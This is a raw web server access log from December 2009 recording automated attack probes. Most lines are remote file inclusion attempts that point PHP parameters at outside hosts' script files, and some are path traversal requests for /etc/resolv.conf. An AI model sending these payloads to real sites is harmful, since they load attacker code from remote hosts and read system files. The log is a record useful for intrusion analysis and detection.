95.110.198.81 - - [16/Dec/2009:08:55:44 -0600] "GET /logs/access_log.1248912000///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
65.55.106.211 - - [16/Dec/2009:08:56:08 -0600] "GET /logs/access_log.1109980800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.110.198.81 - - [16/Dec/2009:08:56:10 -0600] "GET /logs/access_log.1246492800///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:31 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:31 -0600] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:31 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:42 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:42 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:42 -0600] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:46 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:46 -0600] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:46 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:46 -0600] "GET /logs/access_log.1244073600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:47 -0600] "GET /logs/access_log.1244073600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:58:57 -0600] "GET /logs/access_log.1244073600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.116.0.130 - - [16/Dec/2009:09:02:48 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:09:02:48 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /logs/errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /logs/access_log.1227744000/errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /logs/access_log.1225238400/errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /logs/errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /logs/access_log.1227744000/errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:05:05 -0600] "GET /logs/access_log.1225238400/errors.php?error=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:09:06:09 -0600] "GET /logs/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:06:09 -0600] "GET /errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:06:15 -0600] "GET /errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:06:15 -0600] "GET /logs/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:06:18 -0600] "GET /logs/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:06:18 -0600] "GET /errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.187.91.50 - - [16/Dec/2009:09:06:29 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.162 - - [16/Dec/2009:09:07:38 -0600] "GET /logs/access_log.1231718400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.47.61.97 - - [16/Dec/2009:09:10:07 -0600] "GET /logs/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:10:07 -0600] "GET /errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.207.22 - - [16/Dec/2009:09:10:07 -0600] "GET / HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.47.61.97 - - [16/Dec/2009:09:10:20 -0600] "GET /logs/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:10:20 -0600] "GET /errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:10:28 -0600] "GET /errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:10:28 -0600] "GET /logs/errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.47.61.97 - - [16/Dec/2009:09:12:15 -0600] "GET /logs/access_log.1226188800/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
61.47.61.97 - - [16/Dec/2009:09:12:15 -0600] "GET /logs/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
61.47.61.97 - - [16/Dec/2009:09:12:15 -0600] "GET /logs/access_log.1228176000/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
61.47.61.97 - - [16/Dec/2009:09:12:15 -0600] "GET /errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
61.47.61.97 - - [16/Dec/2009:09:12:22 -0600] "GET /logs/access_log.1228176000/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:22 -0600] "GET /logs/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:22 -0600] "GET /errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:22 -0600] "GET /logs/access_log.1226188800/errors.php?error=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:42 -0600] "GET /logs/access_log.1228176000/errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:42 -0600] "GET /logs/errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:42 -0600] "GET /logs/access_log.1226188800/errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:42 -0600] "GET /errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.47.61.97 - - [16/Dec/2009:09:12:50 -0600] "GET /logs/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
61.47.61.97 - - [16/Dec/2009:09:12:53 -0600] "GET /logs/access_log.1226188800/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
61.47.61.97 - - [16/Dec/2009:09:12:59 -0600] "GET /errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
61.47.61.97 - - [16/Dec/2009:09:12:59 -0600] "GET /logs/access_log.1228176000/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
61.47.61.97 - - [16/Dec/2009:09:13:14 -0600] "GET /logs/access_log.1228176000/errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:09:13:14 -0600] "GET /errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:09:13:14 -0600] "GET /logs/errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:09:13:14 -0600] "GET /logs/access_log.1226188800/errors.php?error=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
125.245.165.135 - - [16/Dec/2009:09:14:10 -0600] "GET /logs///skin/ggambo5100_board/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:09:14:10 -0600] "GET /logs/access_log.1256083200///skin/ggambo5100_board/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:09:14:10 -0600] "GET ///skin/ggambo5100_board/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:09:15:11 -0600] "GET /logs/access_log.1255737600///skin/ggambo5100_board/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:16:52 -0600] "GET /logs/access_log.1256342400//write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:16:52 -0600] "GET /logs/access_log.1254700800//write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:16:52 -0600] "GET /logs//write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:17:02 -0600] "GET //write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:18:34 -0600] "GET //bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:18:34 -0600] "GET /logs/access_log.1256083200//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:18:34 -0600] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.228.240.75 - - [16/Dec/2009:09:18:42 -0600] "GET /m2f/m2f_phpbb204.php?m2f_root_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 303 "-""-"
207.228.240.75 - - [16/Dec/2009:09:18:43 -0600] "GET /m2f/m2f_phpbb204.php?m2f_root_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 303 "-""-"
80.246.53.15 - - [16/Dec/2009:09:19:01 -0600] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.246.53.15 - - [16/Dec/2009:09:19:01 -0600] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
80.246.53.15 - - [16/Dec/2009:09:19:01 -0600] "GET /logs/access_log.1236038400//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
80.246.53.15 - - [16/Dec/2009:09:19:01 -0600] "GET /logs/access_log.1255046400//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
80.246.53.15 - - [16/Dec/2009:09:19:25 -0600] "GET /logs/access_log.1255478400//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:19:53 -0600] "GET /logs//write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:19:53 -0600] "GET //write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:19:53 -0600] "GET /logs/access_log.1254700800//write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:09:19:56 -0600] "GET /logs/access_log.1256342400//write.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:09:21:53 -0600] "GET /logs/access_log.1249257600//?_SERVER[DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:09:21:53 -0600] "GET /logs/access_log.1248393600//?_SERVER[DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:09:21:53 -0600] "GET /logs/access_log.1249171200//?_SERVER[DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:09:21:53 -0600] "GET //?_SERVER[DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:09:21:55 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:22:56 -0600] "GET //bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:22:56 -0600] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:22:56 -0600] "GET /logs/access_log.1255478400//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:22:56 -0600] "GET /logs/access_log.1256083200//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:09:23:01 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.116.0.130 - - [16/Dec/2009:09:26:11 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:09:26:12 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
67.227.136.138 - - [16/Dec/2009:09:27:02 -0600] "GET //bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:02 -0600] "GET /logs/access_log.1256342400//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:02 -0600] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:10 -0600] "GET /logs/access_log.1256428800//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:09:27:20 -0600] "GET /logs/access_log.1245801600//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:09:27:20 -0600] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:09:27:20 -0600] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:48 -0600] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:48 -0600] "GET /logs/access_log.1255478400//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:48 -0600] "GET //bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:49 -0600] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:49 -0600] "GET /logs/access_log.1255478400//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:49 -0600] "GET //bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:51 -0600] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:51 -0600] "GET //bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:27:51 -0600] "GET /logs/access_log.1255478400//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:01 -0600] "GET /logs/access_log.1254182400//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:06 -0600] "GET /logs/access_log.1251072000//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:06 -0600] "GET //bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:06 -0600] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:06 -0600] "GET /logs/access_log.1256342400//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:06 -0600] "GET /logs/access_log.1256428800//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:19 -0600] "GET /logs/access_log.1255996800//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:28:47 -0600] "GET /logs/access_log.1255996800//bbs//skin/buzzard_espoon/setup.php?dir=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
195.22.14.131 - - [16/Dec/2009:09:29:06 -0600] "GET /logs/news.php?newsid= HTTP/1.1" 404 296 "-""-"
195.22.14.131 - - [16/Dec/2009:09:29:06 -0600] "GET /news.php?newsid= HTTP/1.1" 404 291 "-""-"
203.16.61.106 - - [16/Dec/2009:09:29:25 -0600] "GET /logs/access_log.1253491200//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:29:25 -0600] "GET /logs/access_log.1255478400//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.228.240.75 - - [16/Dec/2009:09:30:01 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 347 "-""-"
207.228.240.75 - - [16/Dec/2009:09:30:02 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 342 "-""-"
207.228.240.75 - - [16/Dec/2009:09:30:02 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 347 "-""-"
